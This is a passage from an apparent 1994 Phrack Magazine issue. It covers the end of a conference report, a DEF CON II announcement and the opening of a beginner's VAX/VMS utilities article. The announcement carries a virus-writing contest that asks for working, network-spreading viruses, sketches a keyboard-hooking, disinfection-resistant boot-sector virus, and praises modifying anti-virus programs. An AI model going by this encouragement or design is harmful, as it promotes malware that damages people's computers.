  9746. Such technical refinements as Gopher caching daemons pale in comparison.
  9747.  
  9748. - All e-mail into or out of China goes through one node.  Suspicious,
  9749. isn't it?
  9750.  
  9751. -------------------------------------------------------------------------------
  9752. ALTERNATIVE NETWORKS
  9753.  
  9754.   Several people reported about computer networks they set up and are
  9755. operating.  A sampling:
  9756.  
  9757.   APS+Hacktic - Rop Gonggrijp reported about networking services for the
  9758. masses, namely Unix and Internet for about $15 per month, in Holland.
  9759. There are currently 1,000 subscribers, and the funding is sufficient to
  9760. break even and to expand to keep up with exponential demand.
  9761.  
  9762.   A German reported about efforts to provide e-mail to regions of
  9763. ex-Yugoslavia that are severed from one another, either due to
  9764. destroyed telephone lines or to phone lines being shut off by the
  9765. government.  A foundation provided them with the funds to use London
  9766. (later Vienna), which is reachable from both regions, as a common node.
  9767.  
  9768.   The original author of the Zerberus mail system used on many private
  9769. German networks complained about the degree of meta-discussion and how
  9770. his program was being used for people to complain about who is paying
  9771. what for networking services and so forth.  He said he did not create
  9772. it for such non-substantial blather.  The difference between now and
  9773. several years ago is that now there are networks that work,
  9774. technically, and the problem is how to use them in a worthwhile manner.
  9775.  
  9776.   A German of Turkish origin is trying to allow Turks in Turkey to
  9777. participate in relevant discussions on German networks (in German) and
  9778. is providing translating services (if I heard right, some of this
  9779. was being done in Sweden).  This killed the rest of the session,
  9780. which degenerated into a discussion of which languages were/are/should
  9781. be used on which networks.
  9782.  
  9783. -------------------------------------------------------------------------------
  9784. HOW AN INTELLIGENCE SERVICE WORKS:  STASI TRAINING VIDEOS
  9785.  
  9786.   The person introducing the videos sat on the stage, the room
  9787. darkened.  The camera blotted out his upper body and face; all that was
  9788. to see on the video, projected behind him, was a pair of hands moving
  9789. around.
  9790.  
  9791.   It apparently didn't take much to earn a file in the Stasi archives.
  9792. And once you were in there, the "10 W's:  Wo/wann/warum/mit wem/..."
  9793. ("where/when/why/with whom/...") ensured that the file, as well as
  9794. those of your acquaintances, grew.
  9795.  
  9796.   The videos reported the following "case studies":
  9797.  
  9798.   - The tale of "Eva," whose materialistic lifestyle, contacts with
  9799. Western capitalists, and "Abenteuerromantik" tendencies made her a
  9800. clear danger to the state, as well as a valuable operative.  She swore
  9801. allegiance to the Stasi and was recruited.  Eventually the good working
  9802. relationship deteriorated, and the Stasi had to prevent her from trying
  9803. to escape to the West.  The video showed how the different parts of the
  9804. intelligence service worked together.
  9805.  
  9806.   - A member of the military made a call to the consulate of West
  9807. Germany in Hungary.  The list of 10,000 possible travellers to Hungary
  9808. in the relevant time frame was narrowed down to 6,000 on the basis of a
  9809. determination of age and accent from the recorded conversation, then
  9810. down to 80 by who would have any secrets to sell, then down to three
  9811. (by hunch?  I don't remember now).
  9812.  
  9813.   One video showed how a subversive was discreetly arrested.  Cameras
  9814. throughout the city were used to track his movements.  When he arrived
  9815. at his home, a few workers were "fixing" the door, which they claimed
  9816. couldn't be opened at the moment.  They walked him over to the next
  9817. building to show him the entrance, and arrested him there.  A dinky
  9818. little East German car comes up, six people pile into it.  Two
  9819. uniformed police stand on the sidewalk pretending nothing is happening.
  9820.                               ==Phrack Magazine==
  9821.  
  9822.                  Volume Five, Issue Forty-Five, File 14 of 28
  9823.  
  9824. ****************************************************************************
  9825.  
  9826. Updated Last : 3.14.1994
  9827. Late Night Hack Announcement #4.2
  9828.  
  9829. XXXXXXXXXXXXXXXXXXXXXXXX XX     DEF CON II Convention Update Announcement
  9830. XXXXXXXxxxxXXXXXXXXXXXXXXX XX   DEF CON II Convention Update Announcement
  9831. XXXXXXxxxxxxXXXXXX  X    X      DEF CON II Convention Update Announcement
  9832. XXXXXxxxxxxxxXXXXXXX  X         DEF CON II Convention Update Announcement
  9833. XXXXxxxxxxxxxxXXXX XXXXXXXXX    DEF CON II Convention Update Announcement
  9834. XXXxxxxxxxxxxxxXXXXXXXXXX X     DEF CON II Convention Update Announcement
  9835. XXxxxxxxxxxxxxxxXXXXXX  XX  X   DEF CON II Convention Update Announcement
  9836. XXXxxxxxxxxxxxxXXXXXXXX         DEF CON II Convention Update Announcement
  9837. XXXXxxxxxxxxxxXXXXXXXX X XX     DEF CON II Convention Update Announcement
  9838. XXXXXxxxxxxxxXXXXXXXXXX  XX X   DEF CON II Convention Update Announcement
  9839. XXXXXXxxxxxxXXXXXXXXX X         DEF CON II Convention Update Announcement
  9840. XXXXXXXxxxxXXXXXXXXXXXXXXX      DEF CON II Convention Update Announcement
  9841. XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX DEF CON II Convention Update Announcement
  9842.  
  9843. READ & DISTRIBUTE & READ & DISTRIBUTE & READ & DISTRIBUTE & READ & DISTRIBUTE
  9844.  
  9845. =============================================================================
  9846.  
  9847. What's this?  This is an updated announcement and invitation to DEF CON II,
  9848. a convention for the "underground" elements of the computer culture.  We try
  9849. to target the (Fill in your favorite word here): Hackers, Phreaks, Hammies,
  9850. Virii Coders, Programmers, Crackers, Cyberpunk Wannabees, Civil Liberties
  9851. Groups, CypherPunks, Futurists, Artists, Etc..
  9852.  
  9853. WHO:   You know who you are, you shady characters.
  9854. WHAT:  A convention for you to meet, party, and listen to some speeches
  9855.        that you would normally never hear.
  9856. WHEN:  July 22, 23, 24 - 1994 (Speaking on the 23rd and 24th)
  9857. WHERE: Las Vegas, Nevada @ The Sahara Hotel
  9858.  
  9859. So you heard about DEF CON I, and want to hit part II?  You heard about the
  9860. parties, the info discussed, the bizarre atmosphere of Las Vegas and want to
  9861. check it out in person?  Load up your laptop muffy, we're heading to Vegas!
  9862.  
  9863. Here is what Three out of Three people said about last years convention:
  9864.  
  9865. "DEF CON I, last week in Las Vegas, was both the strangest and the best
  9866. computer event I have attended in years." -- Robert X. Cringely, Info World
  9867.  
  9868. "Toto, I don't think we're at COMDEX anymore." -- CodeRipper, Gray Areas
  9869.  
  9870. "Soon we were at the hotel going through the spoils: fax sheets, catalogs,
  9871. bits of torn paper, a few McDonald's Dino-Meals and lots of coffee grounds.
  9872. The documents disappeared in seconds."  -- Gillian Newson, New Media Magazine
  9873.  
  9874. DESCRIPTION:
  9875.  
  9876. Last year we held DEF CON I, which went over great, and this year we are
  9877. planning on being bigger and better.  We have expanded the number of
  9878. speakers to included midnight tech talks and additional speaking on Sunday.
  9879. We attempt to bring the underground into contact with "legitimate" speakers.
  9880. Sure it's great to meet and party with fellow hackers, but besides that we
  9881. try to provide information and speakers in a forum that can't be found at
  9882. other conferences.
  9883.  
  9884. While there is an initial concern that this is just another excuse for the
  9885. evil hackers to party and wreak havoc, it's just not the case.  People come
  9886. to DEF CON for information and for making contacts.  We strive to distinguish
  9887. this convention from others in that respect.
  9888.  
  9889. WHAT'S NEW THIS YEAR:
  9890.  
  9891. This year will be much larger and more organized (hopefully) than last year.
  9892. We have a much larger meeting area, and have better name recognition.
  9893. Because of this we will have more speakers on broader topics.  Expect
  9894. speaking to run Saturday and Sunday, ending around 5 p.m.  Some of the new
  9895. things expected include:
  9896.  
  9897. > An Internet connection with sixteen ports will be there, _BUT_ will only
  9898.   provide serial connections because terminals are too hard to ship.  So
  9899.   bring a laptop with communications software if you want to connect to the
  9900.   network.  Thanks to cyberlink communications for the connection.
  9901.  
  9902. > There will be door prizes, and someone has already donated a Cell Phone
  9903.   and a few "Forbidden Subjects" cd ROMs to give away, thanks to Dead Addict.
  9904.  
  9905. > Dr. Ludwig will present his virus creation awards on Sunday.
  9906.  
  9907. > A bigger and better "Spot The Fed" contest, which means more shirts to
  9908.   give away.
  9909.  
  9910. > More room, we should have tables set up for information distribution.
  9911.   If you have anything you want distributed, feel free to leave it on the
  9912.   designated tables.  Yes, this year there will be a true 24 hour
  9913.   convention space.
  9914.  
  9915. > A 24 hour movie / video suite where we will be playing all type of stuff.
  9916.   VHS Format.  Mail me with suggested titles to show, or bring your own.
  9917.   We'll use a wall projector when not in use by speakers.
  9918.  
  9919. > Midnight Tech Talks on Friday and Saturday night to cover the more
  9920.   technical topics and leave the days free for more general discussions.
  9921.  
  9922. WHO IS SPEAKING:=============================================================
  9923.  
  9924. This list represents almost all of the speakers verified to date.  Some
  9925. people do not want to be announced until the event for various reasons, or
  9926. are waiting for approval from employers.  A speaking schedule will go out
  9927. in the next announcement.
  9928.  
  9929.  
  9930. Philip Zimmerman, Notorious Cryptographer & Author of PGP.
  9931.  
  9932. Dr. Ludwig, Author of "The Little Black Book of Computer Viruses," and
  9933.     "Computer Viruses, Artificial Life and Evolution"
  9934.  
  9935. Loyd Blankenship (The Mentor), Net Running in the 90's and RPG.
  9936.  
  9937. Padgett Peterson, Computer Enthusiast, Anti-Virus Programmer.
  9938.  
  9939. The Jackal, A Radio Communications Overview, Digital Radio and the Hack Angle.
  9940.  
  9941. Judi Clark, Computer Professionals for Social Responsibility.
  9942.  
  9943. Gail Thackery, (Of Operation Sun Devil Fame), Topic to be Announced.
  9944.  
  9945. To be Announced, The Software Publishers Association, Topic to be Announced.
  9946.  
  9947. Toni Aimes, Ex U.S. West Cellular Fraud, Cellular Fraud Topics.
  9948.  
  9949. Mark Lotter, Cellular Enthusiast, Hacking Cell Phones.
  9950.  
  9951. Lorax, The Lighter Side of VMBs.
  9952.  
  9953. Peter Shipley, Unix Stud, Q&A on Unix Security.
  9954.  
  9955. George Smith, Crypt Newsletter, Virus Topic to be Announced.
  9956.  
  9957. Cathy Compton, Attorney, Q&A Surrounding Seizure Issues, Etc.
  9958.  
  9959. John Littman, Reporter and Author, Kevin Poulson, Mitnick, and Agent Steal.
  9960.  
  9961. Red Five & Hellbender, Madmen With a Camcorder, Who Knows?
  9962.  
  9963. Erik Bloodaxe, Phrack Editor, Wierd Wireless Psycho Shit.. Stay Tuned..
  9964.  
  9965. There should be a few round table discussions on Virus, Cellular, Unix and
  9966. something else surrounding the industry.
  9967.  
  9968. I'll name the rest of the speakers as they confirm.  I'm still working on
  9969. a few (Two?) people and groups, so hopefully things will work out and I can
  9970. pass the good news on in the next announcement, or over our List Server.
  9971.  
  9972. ============================================================================
  9973.  
  9974. WHERE THIS THING IS:
  9975.  
  9976. It's in Las Vegas, the town that never sleeps.  Really. There are no clocks
  9977. anywhere in an attempt to lull you into believing the day never ends.  Talk
  9978. about virtual reality, this place fits the bill with no clunky hardware.  If
  9979. you have a buzz you may never know the difference.  It will be at the Sahara
  9980. Hotel.  Intel is as follows:
  9981.  
  9982.         The Sahara Hotel: 1.800.634.6078
  9983.  
  9984.         Room Rates: Single/Double $55, Triple $65, Suite $120
  9985.                     (Usually $200) + 8% tax
  9986.  
  9987.         Transportation: Shuttles from the airport for cheap.
  9988.  
  9989.    NOTE:  Please make it clear you are registering for the DEF CON II
  9990.    convention to get the room rates.  Our convention space price is
  9991.    based on how many people register.  Register under a false name if
  9992.    it makes you feel better, 'cuz the more that register the better for
  9993.    my pocket book.  No one under 21 can rent a room by themselves, so
  9994.    get your buddy who is 21 to rent for you and crash out.  Try to contact
  9995.    people on the Interactive Mailing List (More on that below) and
  9996.    hook up with people.  Don't let the hotel people get their hands on
  9997.    your baggage, or there is a mandatory $3 group baggage fee.  Vegas
  9998.    has killer unions.
  9999.  
  10000. OTHER STUFF:
  10001.  
  10002. I'll whip up a list of stuff that's cool to check out in town there so if for
  10003. some reason you leave the awesome conference you can take in some unreal
  10004. sites in the city of true capitalism.  If anyone lives in Las Vegas, I
  10005. would appreciate it if you could send a list of some cool places to check out
  10006. or where to go to see the best shows and I'll post it in the next
  10007. announcement or in the program
  10008.  
  10009. -> I am asking for people to submit to me any artwork, pictures, drawings,
  10010.    logos, etc. that they want me to try and include in this years program.
  10011.    I am trying to not violate any copyright laws, but want cool shit.  Send
  10012.    me your art or whatever and I'll try and use it in the program, giving you
  10013.    credit for the work, of course.  Please send it in .TIF format if it has
  10014.    more than eight bit color.  The program will be eight bit black and white,
  10015. -> in case you want to make adjustments on your side.
  10016.  
  10017.  
  10018. PLEASE DONATE "STUFF" FOR THE GIVEAWAY:
  10019.  
  10020.     We are trying to raffle off interesting and old functional items.  If
  10021. you have anything such as old computers, modems, weird radio stuff, books,
  10022. magazines, etc that you want to get rid of, please call or mail me with
  10023. what it is, or bring it along.  I don't want to waste peoples time giving
  10024. away rubber bands or anything, but pretty much anything else will go.
  10025.  
  10026. *** NEW MAILING LIST SERVER ***
  10027.  
  10028. We've finally gotten Major Domo List Serv software working (Kinda) and it
  10029. is now ready for testing.  MTV spent a lot of time hacking this thing to work
  10030. with BSDi, and I would like to thank him.  The purpose of the list is to
  10031. allow people interested in DEF CON II to chat with one another.  It would
  10032. be very useful for people over 21 who want to rent hotel space, but split
  10033. costs with others.  Just mention you have room for 'x' number of people, and
  10034. I'm sure you'll get a response from someone wanting to split costs.  Someone
  10035. also suggested that people could organize a massive car caravan from Southern
  10036. Ca. to the Con.  My attitude is that the list is what you make of it.  Here
  10037. are the specifics:
  10038.  
  10039. Umm.. I TAKE THAT BACK!!  The mailing list is _NOT_ ready yet.  Due to
  10040. technical problems, etc.  I'll do another mass mailing to everyone letting
  10041. them know that the list is up and how to access it.  Sorry for the delay!
  10042.  
  10043.  
  10044. MEDIA:
  10045.  
  10046. Some of the places you can look for information from last year include:
  10047.  
  10048. New Media Magazine, September 1993
  10049. InfoWorld, 7-12-1993 and also 7-19-1993 by Robert X. Cringely
  10050. Gray Areas Magazine, Vol 2, #3 (Fall 1993)
  10051. Unix World, ???,
  10052. Phrack #44, #45
  10053.  
  10054. COST:
  10055.  
  10056. Cost is whatever you pay for a hotel room split however many ways, plus
  10057. $15 if you preregister, or $30 at the door.  This gets you a nifty 24 bit
  10058. color name tag (We're gonna make it niftier this year) and your foot in the
  10059. door.  There are fast food places all over, and there is alcohol all over
  10060. the place but the trick is to get it during a happy hour for maximum
  10061. cheapness.
  10062.  
  10063. ============================================================================
  10064.  
  10065. I wanted to thank whoever sent in the anonymous fax to Wired that
  10066. was printed in issue 1.5  Cool deal!
  10067.  
  10068. =============================================================================
  10069.  
  10070. FOR MORE INFORMATION:
  10071.  
  10072. For InterNet users, there is a DEF CON anonymous ftp site at cyberspace.com
  10073. in /pub/defcon.  There are digitized pictures, digitized speeches and text
  10074. files with the latest up to date info available.
  10075.  
  10076. For email users, you can email dtangent@defcon.org for more information.
  10077.  
  10078. For non-net people call:
  10079.  
  10080.                   ----  A  L  L  I  A  N  C  E  ----
  10081.                            SysOp  Metalhead
  10082.                One Thousand One Hundred Megabytes Online
  10083.               612.251.8596  USRobotics 16.8 Dual Standard
  10084.                    Synchronet Multinode BBS Software
  10085.       International Informational Retrieval Guild (IIRG) Distro Site
  10086.               Electronic Frontier Foundation  (EFF) MEMBER
  10087.             American Bulletin Board Association (ABBA) MEMBER
  10088. -----------------------------------------------------------------------
  10089.  o 200+ Message bases.  No post call ratio.  Nope, not ever.
  10090.  o FidoNet [1:282/8004]
  10091.  o CyberCrime international [69:4612/2]
  10092.  o International Networked message ECHO areas:
  10093.    UFO, VIRUS, REPTILE, MUSIC, Twin Cities Chat, NORML, Telephone Watch,
  10094.    TRADEWARS, MONTE PYTHON, FCC, NO PIRACY, CLASSIFIEDS
  10095.    BBS Software & SYSOP Support, MUSIC, FISHING/HUNTING, Stephen King,
  10096.    Programming, Computers, Foreign Language, iCE/ACiD/TRiBE, COLLEGE
  10097.    LIVING, POLITICS, POETRY, RACISM, and too many more to mention
  10098.  o Computer Underground Magazines, History, Updates & Text
  10099.  o DEF CON Mirrior Archive
  10100.  o uXu, PHANTASY, CuD, EFF Magazine(s) Distro Site
  10101.  o Internet email mailbox (your.name.here@f8004.n282.z1.fidonet.org)
  10102.  o 30 day FULL ACCESS Trial Account...$10/year MEMBERship (sub. to change)
  10103. -----------------------------------------------------------------------
  10104.  
  10105. For Snail Mail send to: DEF CON, 2709 E. Madison Street Suite #102,
  10106.                         Seattle, WA, 98112
  10107.  
  10108. For Voice Mail and maybe a human (me), 0-700-TANGENT on an AT&T phone.
  10109.  
  10110. A DEF CON Mailing list is maintained, and the latest announcements are mailed
  10111. automatically to you.  If you wish to be added to the list just send email
  10112. to dtangent@defcon.org.
  10113.  
  10114. =============================================================================
  10115.  
  10116. (Note, I have put a copy of Dr. Ludwig's new KOH Data security encryption
  10117. Virus online at the DEF CON ftp site in /pub/defcon/KOH along with full
  10118. documentation.  Get CrAzY.)
  10119.  
  10120.  
  10121. VIRUS CREATION AWARDS:
  10122.  
  10123.                                    Announcing
  10124.                                       The
  10125.                    Second International Virus Writing Contest
  10126.                                   Sponsored by
  10127.                 American Eagle Publications, Inc. P.O. Box 41401
  10128.                              Tucson, AZ 85717 USA
  10129.                                       and
  10130.                            The Crypt Infosystems BBS
  10131.                                +1 (818) 683-0854
  10132.  
  10133.                                 *** The Goal ***
  10134.  
  10135. The purpose of this contest is to write a fully functional computer virus that
  10136. entertains people with political satire.  Viruses will be judged on the basis
  10137. of originality, creativity, functionality, and political incorrectness.
  10138.  
  10139.                              *** Eligibility ***
  10140.  
  10141.                Anyone who can write a computer virus is eligible.
  10142.  
  10143.                              *** Contest Dates ***
  10144.  
  10145. The contest is underway from January 1, 1994 until June 30, 1994. Your
  10146. submissions must be received by June 30 to qualify. The winner of the
  10147. contest will be announced at the DEFCON conference in Las Vegas, July 22-24,
  10148. 1994. If you can be present, an official award will be bestowed on you at
  10149. that time.
  10150.  
  10151.          *************************************************************
  10152.  
  10153.                                     Details
  10154.  
  10155.          *************************************************************
  10156.  
  10157. The philosopher Friedrik Nietzsche once said that if you want to kill
  10158. something, you must laugh at it--and laugh at it deeply. So there should be
  10159. little wonder that political satire is as old as politics itself.
  10160.  
  10161. Is there something going on in the political arena that you abhor, that makes
  10162. you sick, that is just plain wrong? Well, here's your chance to make a
  10163. mockery of it. I've always had this idea that if someone wrote a sufficiently
  10164. witty virus that really addressed the issues the way the people (not the
  10165. press, not the politicians) saw them, it might just get passed around by
  10166. people voluntarily.
  10167.  
  10168. Let's find out.
  10169.  
  10170. Write a virus that is itself a political satire. I don't mean a virus that
  10171. simply displays a message. I mean a living entity whose every move--whose
  10172. every action--is politically motivated. If you need more than one virus to
  10173. make your point--perhaps two viruses working together, or something like that,
  10174. that is fine.
  10175.  
  10176.          -----------------------------------------------------------
  10177. Let me give you a simple example: The Political Correctness Virus
  10178.  
  10179. This virus is a spoof on the "political correctness" movement--which is just
  10180. a form of self-imposed censorship--that is sweeping American intellectual
  10181. circles, particularly colleges and universities.
  10182.  
  10183. This virus is a memory resident boot sector virus which maintains a list of
  10184. politically incorrect words on your computer system. It also hooks the
  10185. keyboard interrupt and monitors every keystroke you make. If you type a
  10186. politically incorrect word into the computer, the PCV springs into action.
  10187.  
  10188. Politically incorrect words are ranked at three different offense levels.
  10189. When the PCV encounters such a word, it determines what offense level that
  10190. word is, and acts accordingly.
  10191.  
  10192. The least offensive words merely register a beep. More offensive words cause
  10193. a beep to sound for 10 seconds. The most offensive words cause a siren to
  10194. sound for two minutes, locking the system for that duration. If you turn the
  10195. computer off before the two minutes are up, the virus will stop the boot
  10196. process for five minutes, with sirens, when you turn it back on. If you allow
  10197. the siren to complete, then you can proceed.
  10198.  
  10199. The virus has two different word lists, both stored in an encrypted and
  10200. compressed format. The list is selected at random when the system is
  10201. infected, after which it cannot be changed. The first list is the "proper"
  10202. list of political correctness no-no's. For example, a word like "sodomite" is
  10203. among the worst possible offenses. The second list is an inverted list of
  10204. no-no's.  This list trys to force you to use "sodomite" by flagging words
  10205. like "gay" and "homosexual" as no-no's.
  10206.  
  10207. If you allow the PCV to live in your system for three months without getting
  10208. a single flag, you are given the supreme honor of viewing the word list
  10209. assigned to you and adding a word to it. If you get more than 3000 flags in
  10210. a lifetime, the virus will force you to enter a politically correct word
  10211. before allowing you to start the computer, since you are obviously unwilling
  10212. to submit to its censorship.
  10213.  
  10214. The virus also uses powerful means to prevent disinfection, so that, once you
  10215. get it, you can't get rid of it without a major effort.
  10216.  
  10217.          ------------------------------------------------------------
  10218.  
  10219. Now, I know you can get a lot more creative than this--so do it! Design your
  10220. virus carefully, so that everything it does has meaning. Then send it in.
  10221.  
  10222. Here are the criteria we'll use:
  10223.  
  10224. 1. Originality: Your virus must be an original work. Do not send us anything
  10225. that is not 100% yours. Your message should be original too. Do not just
  10226. ape what everybody else is saying, especially the media. Also, a refined wit
  10227. is much to be preferred over vulgarity. Vulgarity is a substitute for
  10228. original wit. Foul language, porn, etc., are out. Destructive features should
  10229. be incorporated only if they are VERY appropriate (perhaps if you are
  10230. commenting on real live genocide in your country, or something like that).
  10231. In general, though, destructive features will hurt you, not help you. The one
  10232. exception is modifying anti-virus programs. That is considered to be
  10233. CONstructive activity.
  10234.  
  10235. 2. Creativity: Make us laugh, make us cry. Amaze us with how bits and bytes
  10236. can say something about politics and issues.  Think of it like this:
  10237. displaying a message on the screen is like reading a text file. What we want
  10238. is the equivalent of a multi-media extravaganza. Use all the system's
  10239. resources to tell your message. Don't be afraid to write a virus that has
  10240. some weird mode of infecting programs that tells a story, or to write one
  10241. that sends faxes to the White House, or sends an automatic request for reams
  10242. of free information to some government agency.
  10243.  
  10244. 3. Functionality: The virus has to work. If it only works on some machines,
  10245. or under some versions of DOS, or what-not, then that will count against
  10246. you. The better it is at infecting systems and moving around, the better off
  10247. you will be. So, for example, if you write a file-infector, make sure it can
  10248. jump directories, and--if you're up to it--migrate across a network.
  10249.  
  10250. 4. Political incorrectness: Since computer viruses are politically incorrect,
  10251. their message should be too. If you send us a pro-establishment virus, then
  10252. you will not win this contest. A word to the wise: think twice about what's
  10253. correct and what's not. Many positions are only superficially incorrect,
  10254. though they are really quite fashionable among the establishment. Look at it
  10255. this way: if you could get a well-written letter expressing your view
  10256. published in a big city newspaper, then it's not sufficiently incorrect.
  10257. There are a LOT of ideas that are unofficially censored by society--
  10258. especially the media and academia. They tend to make themselves out to be the
  10259. rebels, but they are really the establishment. If you can't think of anything
  10260. creatively incorrect and sufficiently obnoxious then you shouldn't be writing
  10261. viruses in the first place.
  10262.  
  10263.          *************************************************************
  10264.  
  10265.                              How to Submit an Entry
  10266.  
  10267. You may mail your entry to American Eagle Publications at the above address,
  10268. or you may e-mail it to ameagle@mcimail.com. Alternatively, you can submit it
  10269. by dialing the Crypt Infosystems BBS and uploading it there. To get on to the
  10270. system quickly, efficiently and anonymously, log on as VIRUS, using the
  10271. password CONTEST.
  10272.  
  10273. An entry consists of:
  10274.  
  10275. 1. A complete copy of your virus, both source and executable files.
  10276.  
  10277. 2. If the political satire isn't perfectly obvious, send a verbal description
  10278. of how the virus works and why it does what it does. This is especially
  10279. important if you are not an American and you are commenting on something that
  10280. has not received worldwide attention. I don't care if you're Bulgarian and
  10281. you're commenting on something we've never heard of--just make sure you
  10282. explain it, or we won't understand and you'll lose.
  10283.  
  10284. 3. If you want to be recognized for your work, include your name (real or
  10285. handle), and a way we can get in contact with you.
  10286.  
  10287. By submitting an entry, you grant American Eagle Publications, Inc. the right
  10288. to publish your virus in any form. You agree not to make your virus public
  10289. prior to July 25, 1994. If you do, you are automatically disqualified from
  10290. the contest.
  10291.  
  10292. For the sake of privacy, you may encrypt your entry and send it in with the
  10293. following PGP key (which we highly recommend if you have PGP):
  10294.  
  10295.     -----BEGIN PGP PUBLIC KEY BLOCK-----
  10296.     Version: 2.1
  10297.  
  10298.     mQCNAi09jVgAAAEEAN3M9LFQXeBprkZuKo5NtuMC+82qNd3/8saHLO6iuGe/eUai
  10299.     8Vx7yqqpyLjZDGbAS7bvobrcY3IyFeu8PXG4T8sd+g81P0AY0PHUqxxPG3COvBfP
  10300.     oRd+79wB66YCTjKSwd3KVaC7WG/CyXDIX5W6KwCaGL/SFXqRChWdf2BGDUCRAAUR
  10301.     tApDT05URVNUXzk0
  10302.     =Z20c
  10303.     -----END PGP PUBLIC KEY BLOCK-----
  10304.  
  10305. Good luck!
  10306.  
  10307.          ****************************************************************
  10308.  
  10309.                                   P R I Z E S
  10310.  
  10311. In addition to instant worldwide fame and recognition, you'll get:
  10312.  
  10313. 1. A cash prize of $100 US.
  10314.  
  10315. 2. A year's subscription to Computer Virus Developments Quarterly.
  10316.  
  10317. 3. Your virus will be published in Computer Virus Developments Quarterly,
  10318. and other fine journals.
  10319.  
  10320. 4. A handsome engraved plaque recognizing your contribution to the betterment
  10321. of mankind.
  10322.  
  10323. 5.  A free secret surprise that we cannot tell you about right now, valued
  10324. at $100.
  10325.  
  10326. Two runner-ups will receive the secret surprise.
  10327.  
  10328.                                 !!  GO FOR IT !!
  10329.  
  10330.  
  10331. =============================================================================
  10332.  
  10333. STUFF TO SPEND YOUR MONEY ON:
  10334.  
  10335. > Tapes of last years speakers (four 90 minute tapes) are available for $20
  10336.  
  10337. > DEF CON I tee-shirts (white, large only) with large color logo on the
  10338.   front, and on the back the Fourth Amendment, past and present.  This is
  10339.   shirt v 1.1 with no type-o's.  These are $20, and sweatshirts are $25.
  10340.  
  10341. > DEF CON II tee-shirts will be made in various colors this year, including
  10342.   a few long sleeve shirts.  Sizes will be in XL only again, with few white
  10343.   larges made.  Shirts will be $15, Long Sleeve $17, Sweat shirts will be $20.
  10344.   Well, actually, I'll make a small quantity of various stuff, so with luck
  10345.   you'll find something you like.
  10346.  
  10347. > We will have a few (ten maybe?) embroidered hats with this years logo.
  10348.   Not sure how much they will be.. like $10 maybe.
  10349.  
  10350. > Full sized 4 color DEF CON II wall posters will be for sale for about $5.
  10351.  
  10352. > Pre-Register for next year in advance for $15 and save half.
  10353.  
  10354. > Make all checks/money orders/etc. out to DEF CON, and mail to the address
  10355.   above.  Way above.  Above the virus awards announcement.
  10356.  
  10357. If you have any confidential info to send, use this PGP key to encrypt:
  10358.  
  10359. -----BEGIN PGP PUBLIC KEY BLOCK-----
  10360. Version: 2.3
  10361.  
  10362. mQCrAiyI6OcAAAEE8Mh1YApQOOfCZ8YGQ9BxrRNMbK8rP8xpFCm4W7S6Nqu4Uhpo
  10363. dLfIfb/kEWDyLreM6ers4eEP6odZALTRvFdsoBGeAx0LUrbFhImxqtRsejMufWNf
  10364. uZ9PtGD1yEtxwqh4CxxC8glNA9AFXBpjgAZ7eFvtOREYjYO6TH9sOdZSa8ahW7YQ
  10365. hXatVxhlQqve99fY2J83D5z35rGddDV5azd9AAUTtCZUaGUgRGFyayBUYW5nZW50
  10366. IDxkdGFuZ2VudEBkZWZjb24ub3JnPg==
  10367. =ko7s
  10368. -----END PGP PUBLIC KEY BLOCK-----
  10369.  
  10370. - The Dark Tangent
  10371.                               ==Phrack Magazine==
  10372.  
  10373.                  Volume Five, Issue Forty-Five, File 15 of 28
  10374.  
  10375. ****************************************************************************
  10376.  
  10377.                         ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  10378.                         Some Helpful VAX/VMS utilities
  10379.  
  10380.                         ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  10381.  
  10382. Introduction :
  10383. ^^^^^^^^^^^^
  10384. This article contains a brief introduction to some not so often used
  10385. utilities, found on the Virtual Address eXtentions/ Virtual Memory System or
  10386. better known to us as the VAX/VMS.
  10387.  
  10388. Please note that this file is meant for the so called VMS "newbies". It gives
  10389. an insight to the processes that are running in the different "Hibernation"
  10390. states on VMS, quite similar to the background processes running on UNIX and
  10391. its clones. If you have "extensive" experience on VMS as a systems programmer
  10392. or a SysOp, you might want to skip it !!
  10393.  
  10394. Portions of this file are taken from the ever blabbering VMS HELP, which is
  10395. where many of us, myself included, learn about the VAX/VMS. VMS has lots of
  10396. secrets. Locations of "hidden" files are a very well kept secret, known
  10397. not even to the SysOp but only to the system programmer.
  10398.  
  10399. Ok.... Lets get started...
  10400.  
  10401.  
  10402. SHOW SYSTEM   :
  10403. ^^^^^^^^^^^
  10404. This command ($Show system) will display information about the
  10405. status of the processes running on the system.
  10406. There are various options to this command, some of which are listed below.
  10407.  
  10408.  
  10409.     /BATCH     /CLUSTER   /FULL      /NETWORK   /NODE      /OUTPUT
  10410.     /PROCESS   /SUBPROCESS
  10411.  
  10412.  
  10413.  
  10414.  
  10415.          1.  $ SHOW SYSTEM
  10416.  
  10417.        VAX/VMS 5.4  on node DARTH 19-APR-1990 17:45:47.78  Uptime  2 21:53:59
  10418.          Pid    Process Name   State Pri      I/O       CPU  Page flts Ph.Mem
  10419.        27400201 SWAPPER        HIB   16        0  0 00:29:52.05      0      0
  10420.        27401E03 DOCBUILD       LEF    4    37530  0 00:05:47.62  96421    601
  10421.        27402604 BATCH_789      LEF    4     3106  0 00:00:48.67   4909   2636 B
  10422.        27401C05 BATCH_60       LEF    6      248  0 00:00:06.83   1439   1556 B
  10423.        27400207 ERRFMT         HIB    8     6332  0 00:00:41.83     89    229
  10424.        27400208 CACHE_SERVER   HIB   16     2235  0 00:00:05.85     67    202
  10425.        27400209 CLUSTER_SERVER HIB    8     4625  0 00:22:13.28    157    448
  10426.        2740020C JOB_CONTROL    HIB   10   270920  0 01:07:47.88   5163   1384
  10427.        2740020D CONFIGURE      HIB    9      125  0 00:00:00.53    104    264
  10428.         .
  10429.         .
  10430.         .
  10431.        27400E8D Sir Lancelot   LEF    5      226  0 00:00:07.87   4560    697
  10432.        2740049A Guenevere      LEF    4      160  0 00:00:02.69    534    477
  10433.        27401EA0 BATCH_523      CUR  4 4    17470  0 03:25:49.67   8128   5616 B
  10434.        274026AF GAWAIN         CUR  6 4    14045  0 00:02:03.24  20032    397
  10435.        274016D5 GAHERIS        LEF    6      427  0 00:00:09.28   5275   1384
  10436.        27401ED6 knight_1       HIB    5      935  0 00:00:10.17   3029   2204 S
  10437.        274012D7 BATCH_689      LEF    4    49216  0 00:14:18.36   7021   3470 B
  10438.        274032D9 DECW$MAIL      LEF    4     2626  0 00:00:51.19   4328   3087 B
  10439.        274018E3 SERVER_0021    LEF    6      519  0 00:00:07.07   1500    389 N
  10440.        274016E8 NMAIL_0008     HIB    4    10955  0 00:00:55.73   5652    151
